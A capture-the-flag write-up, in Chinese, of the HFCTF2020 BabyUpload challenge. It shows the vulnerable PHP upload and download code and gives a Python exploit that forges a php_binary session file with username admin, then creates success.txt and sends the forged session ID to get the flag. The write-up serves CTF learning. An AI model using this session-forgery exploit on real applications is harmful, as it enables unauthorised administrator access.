# [HFCTF2020]BabyUpload
<?php | |
error_reporting(0); | |
session_save_path("/var/babyctf/"); | |
session_start(); | |
require_once "/flag"; | |
highlight_file(__FILE__); | |
if($_SESSION['username'] ==='admin') | |
{ | |
$filename='/var/babyctf/success.txt'; | |
if(file_exists($filename)){ | |
safe_delete($filename); | |
die($flag); | |
} | |
} | |
else{ | |
$_SESSION['username'] ='guest'; | |
} | |
$direction = filter_input(INPUT_POST, 'direction'); | |
$attr = filter_input(INPUT_POST, 'attr'); | |
$dir_path = "/var/babyctf/".$attr; | |
if($attr==="private"){ | |
$dir_path .= "/".$_SESSION['username']; | |
} | |
if($direction === "upload"){ | |
try{ | |
if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){ | |
throw new RuntimeException('invalid upload'); | |
} | |
$file_path = $dir_path."/".$_FILES['up_file']['name']; | |
$file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']); | |
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){ | |
throw new RuntimeException('invalid file path'); | |
} | |
@mkdir($dir_path, 0700, TRUE); | |
if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){ | |
$upload_result = "uploaded"; | |
}else{ | |
throw new RuntimeException('error while saving'); | |
} | |
} catch (RuntimeException $e) { | |
$upload_result = $e->getMessage(); | |
} | |
} elseif ($direction === "download") { | |
try{ | |
$filename = basename(filter_input(INPUT_POST, 'filename')); | |
$file_path = $dir_path."/".$filename; | |
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){ | |
throw new RuntimeException('invalid file path'); | |
} | |
if(!file_exists($file_path)) { | |
throw new RuntimeException('file not exist'); | |
} | |
header('Content-Type: application/force-download'); | |
header('Content-Length: '.filesize($file_path)); | |
header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"'); | |
if(readfile($file_path)){ | |
$download_result = "downloaded"; | |
}else{ | |
throw new RuntimeException('error while saving'); | |
} | |
} catch (RuntimeException $e) { | |
$download_result = $e->getMessage(); | |
} | |
exit; | |
} | |
?> |
两个条件:$_session [‘username’]===admin 且有 /var/babyctf/success.txt 这个目录
有两个功能,一个上传,一个下载
上传功能:
对我们的文件名做了加密,格式为 name_hashfile ,这格式不就是 session 的文件名格式,且它设置的 session 保存路径和我们的上传路径是一样的,那么思路就有了,通过上传 session 格式的文件,且这个文件解析后的 username 值为 admin ,那么这个的 session 处理器是什么呢?
$direction = filter_input(INPUT_POST, 'direction'); | |
$attr = filter_input(INPUT_POST, 'attr'); | |
$dir_path = "/var/babyctf/".$attr; //$dir_path = /var/babyctf/$_POST['attr'] | |
if($attr==="private"){ | |
$dir_path .= "/".$_SESSION['username']; | |
} | |
if($direction === "upload"){ | |
try{ | |
if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){ | |
throw new RuntimeException('invalid upload'); | |
} | |
$file_path = $dir_path."/".$_FILES['up_file']['name']; | |
$file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']); | |
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){ | |
throw new RuntimeException('invalid file path'); | |
} | |
@mkdir($dir_path, 0700, TRUE); | |
if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){ | |
$upload_result = "uploaded"; | |
}else{ | |
throw new RuntimeException('error while saving'); | |
} | |
} catch (RuntimeException $e) { | |
$upload_result = $e->getMessage(); | |
} | |
} |
下载功能:
elseif ($direction === "download") { | |
try{ | |
$filename = basename(filter_input(INPUT_POST, 'filename')); | |
$file_path = $dir_path."/".$filename; | |
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){ | |
throw new RuntimeException('invalid file path'); | |
} | |
if(!file_exists($file_path)) { | |
throw new RuntimeException('file not exist'); | |
} | |
header('Content-Type: application/force-download'); | |
header('Content-Length: '.filesize($file_path)); | |
header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"'); | |
if(readfile($file_path)){ | |
$download_result = "downloaded"; | |
}else{ | |
throw new RuntimeException('error while saving'); | |
} | |
} catch (RuntimeException $e) { | |
$download_result = $e->getMessage(); | |
} | |
exit; | |
} | |
?> |
这种格式就是 php_binary 处理器 ,然后伪造 admin ,再传一个 success.txt 文件就可以了
exp:
import requests
import hashlib
url = 'http://95068bbf-0b6b-4f2a-990d-179e2bb6e7b5.node4.buuoj.cn:81/'
# 上传伪造的session文件
files = {"up_file": ("sess", b'\x08usernames:5:"admin";')}
data = {
'direction': 'upload',
'attr': ''
}
req = requests.post(url, data=data, files=files)
# 获取session_id
session_id = hashlib.sha256(b'\x08usernames:5:"admin";').hexdigest()
#在/var/babyctf/下创建success.txt目录
data1 = {
'attr': 'success.txt',
'direction': 'upload'
}
req1 = requests.post(url=url, data=data1, files=files)
#通过伪造的session文件解析,获取flag
cookie = {
'PHPSESSID': session_id
}
flag = requests.get(url, cookies=cookie)
print(flag.text)
参考链接:https://blog.csdn.net/shinygod/article/details/127683577
